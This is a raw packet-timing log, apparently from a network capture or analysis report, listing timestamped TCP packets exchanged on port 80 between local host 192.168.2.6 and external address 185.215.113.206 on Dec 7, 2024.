Dec 7, 2024 10:51:52.752911091 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.753629923 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.753703117 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.753732920 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.754615068 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.754648924 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.754684925 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.755439043 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.755469084 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.755517006 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.756422997 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.756452084 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.756486893 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.757380962 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.757412910 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.757513046 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.758122921 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.758130074 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.758225918 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.759068966 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.759097099 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.759099960 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.759998083 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.760029078 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.760219097 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.761151075 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.761178970 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.761288881 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.762058973 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.762062073 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.762119055 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.762168884 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.762809038 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.762835026 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.762865067 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.763562918 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.763588905 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.763648987 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.764496088 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.764524937 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.764601946 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.765387058 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.765414000 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.765503883 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.765865088 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.766343117 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.766395092 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.767246962 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.767384052 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.767410994 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.768193960 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.768421888 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.768449068 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.769076109 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.769207001 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.769227982 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.770066977 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.770122051 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.770217896 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.770919085 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.771080017 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.771104097 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.772152901 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.772247076 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.772270918 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.773101091 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.773200035 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.773220062 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.774163961 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.774190903 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.774214029 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.775012970 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.775039911 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.775058031 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.775886059 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.775928974 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.777960062 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.887953997 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.887974024 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.888371944 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.888448000 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.888478041 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.889194012 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.889348984 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.889377117 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.890070915 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.890121937 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.890130997 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.891004086 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.891156912 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.891182899 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.891982079 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.892030001 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.892052889 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.892831087 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.892966986 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.892988920 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.893768072 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.893857002 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.893882036 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.894145966 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.894610882 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.894651890 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.894675970 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.894712925 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.895494938 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.895514965 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.895536900 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.895553112 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.896389008 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.896429062 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.896498919 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.896533966 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.897342920 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.897384882 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.897449017 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.897484064 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.898243904 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.898289919 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.898355961 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.898391008 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.899164915 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.899208069 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.899210930 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.899243116 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.900052071 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.900094032 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.900151968 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.900185108 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.901025057 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.901062012 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.901076078 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.901110888 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.901859999 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.901901960 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.901967049 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.901998997 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.935384035 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.935517073 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.935559034 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.935741901 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.935771942 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.935784101 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.935853004 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.935889959 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.936645985 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.936696053 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.936974049 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.937014103 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.937091112 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.937124968 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.937935114 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.937977076 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.938045025 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.938080072 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.938796997 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.938838959 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.938903093 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.938935995 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.939728975 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.939779043 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.939831972 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.939866066 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.940644026 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.940704107 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.940746069 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.940779924 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.941536903 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.941581964 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.941726923 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.941762924 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.942424059 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.942472935 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.942513943 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.942547083 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.943361998 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.943416119 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.943497896 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.943536043 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.944246054 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.944293022 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.944335938 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.944389105 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.945147991 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.945195913 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.945213079 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.945242882 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.946058035 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.946101904 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.946151018 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.946185112 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.946969986 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.947014093 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.947067976 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.947101116 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.947874069 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.947913885 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.947927952 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.947961092 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.948796034 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.948839903 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.948893070 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.948928118 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.949732065 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.949786901 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.949814081 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.949847937 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.950627089 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.950680971 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.950723886 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.950761080 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.951494932 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.951539040 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.951607943 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.951653957 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.952419043 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.952457905 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.952501059 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.952533960 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.953329086 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.953373909 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.953423023 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.953459024 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.954253912 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.954273939 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.954303026 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.954327106 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.955117941 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.955166101 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.955229998 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.955265999 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.956022978 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.956067085 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.956140041 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.956176043 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.956933975 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.956981897 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.957022905 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.957058907 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.957844973 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.957895041 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.957933903 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.957973003 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.958750963 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.958806992 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.958841085 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.958894968 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.959703922 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.959759951 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.959805965 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.959842920 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.960568905 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.960617065 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.960673094 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.960711002 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.961468935 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.961518049 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.961527109 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.961564064 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.962380886 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.962431908 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.962483883 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.962518930 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.963289022 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.963349104 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.963468075 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.963514090 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.964261055 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.964307070 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.964325905 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.964363098 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.965091944 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.965138912 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.965202093 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.965312958 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.966016054 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.966058016 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.966164112 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.966233969 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.966919899 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.966983080 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.967019081 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.967055082 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:52.967789888 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:52.967843056 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.079898119 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.079957008 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.080063105 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.080102921 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.080333948 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.080374956 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.080451012 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.080491066 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.081245899 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.081312895 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.081561089 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.081624985 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.081705093 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.081763029 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.082484961 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.082542896 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.082613945 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.082664967 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.083565950 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.083617926 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.083699942 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.083739042 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.084392071 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.084444046 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.084486961 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.084527969 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.085267067 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.085319042 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.085352898 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.085402966 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.086110115 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.086157084 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.086211920 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.086257935 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.087039948 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.087165117 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.087169886 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.087228060 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.087915897 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.087970018 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.088119984 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.088160038 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.088826895 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.088879108 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.088879108 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.089073896 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.089749098 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.089875937 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.089898109 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.089931965 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.090671062 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.090724945 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.091089964 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:53.091133118 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:53.091625929 CET	80	49808	185.215.113.206	192.168.2.6
